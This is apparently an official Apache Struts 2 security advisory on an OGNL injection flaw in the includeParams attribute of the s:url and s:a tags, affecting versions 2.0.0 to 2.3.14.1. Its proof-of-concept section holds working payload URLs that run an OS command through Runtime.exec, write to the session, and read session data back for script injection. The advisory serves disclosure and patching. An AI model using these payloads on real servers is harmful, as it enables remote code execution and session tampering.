Summary
Excerpt |
---|
A vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks |
Who should read this | All Struts 2 developers and users |
---|---|
Impact of vulnerability | Remote command execution, remote server context manipulation, injection of malicious client side code |
Maximum security rating |
Critical | |
Recommendation | Developers should immediately upgrade to Struts 2.3.14.2 |
---|---|
Affected Software | Struts 2.0.0 - Struts 2.3.14.1 |
Reporter | Eric Kobrin and Douglas Rodrigues (Akamai), Coverity Security Research Laboratory, NSFOCUS Security Team |
CVE Identifier |
Problem
Both the s:url and s:a tag provide an includeParams attribute.
...
The issue was originally addressed by Struts 2.3.14.1 and Security Announcement S2-013. However, the solution introduced with 2.3.14.1 did not address all possible attack vectors, such that every version of Struts 2 before 2.3.14.2 is still vulnerable to such attacks.
Proof of concept
Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
Code Block includeParams="all"
Such that the line will be something look like this:
Code Block xml xml <s:url id="url" action="HelloWorld" includeParams="all">
- Run struts2-blank app
Open the following url, resulting in calc application opening on Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):
Code Block http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}
Open the following url to modify session content:
Code Block http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='true'}
Open the following url to print out session content and in combination with the previous example introduce arbitrary code into the resulting HTML output:
Code Block http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}
...